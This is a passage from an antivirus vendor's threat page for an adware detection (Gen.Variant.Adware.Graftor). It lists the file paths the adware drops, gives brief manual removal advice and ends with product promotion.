%Documents and Settings%\%current user%\Local Settings\Temp\nsc2.tmp (39245 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss3.tmp\System.dll (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss3.tmp\RCWidgetPlugin.dll (36078 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss3.tmp\modern-header.bmp (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss3.tmp\FileInfo.dll (4992 bytes)
%Program Files%\Common Files\System\safemonn32.dll (180 bytes)
%Program Files%\Common Files\System\config.dat (143 bytes)
%Program Files%\Common Files\System\safe.dat (3719 bytes)
%Program Files%\Common Files\System\OverlayIcon.dll (237 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\safe.dat (3719 bytes)
C:\unit.bat (103 bytes)
Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
Reboot the computer.

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.

Permalink

Back to the blog

e-mail

Google+

Twitter

Facebook

Gen.Variant.Adware.Graftor.167470_a6590134fc

Our best antivirus yet!

Fresh new look. Faster scanning. Better protection.

Discover the new adaware antivirus 12

Our best antivirus yet

Gen.Variant.Adware.Graftor.167470_a6590134fc

E-mail

Our best antivirus yet!

Fresh new look. Faster scanning. Better protection.

Discover the new adaware antivirus 12

Our best antivirus yet